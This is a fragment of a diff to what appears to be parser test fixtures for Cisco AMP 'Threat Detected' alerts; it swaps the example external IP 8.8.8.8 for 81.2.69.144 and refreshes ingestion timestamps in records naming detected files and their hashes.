717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337215400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2819,7 +2819,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2869,7 +2869,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2886,8 +2886,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174575965Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337220Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2909,7 +2909,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2959,7 +2959,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2972,8 +2972,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174578120Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337244600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2995,7 +2995,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3045,7 +3045,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3062,8 +3062,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174580181Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337250700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3085,7 +3085,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3132,7 +3132,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3142,8 +3142,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174582214Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337256700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3165,7 +3165,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3215,7 +3215,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3228,8 +3228,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174584201Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337262700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3251,7 +3251,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3298,7 +3298,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3308,8 +3308,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174586257Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337268600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3331,7 +3331,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3378,7 +3378,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3388,8 +3388,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174588275Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337274600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3411,7 +3411,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3458,7 +3458,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
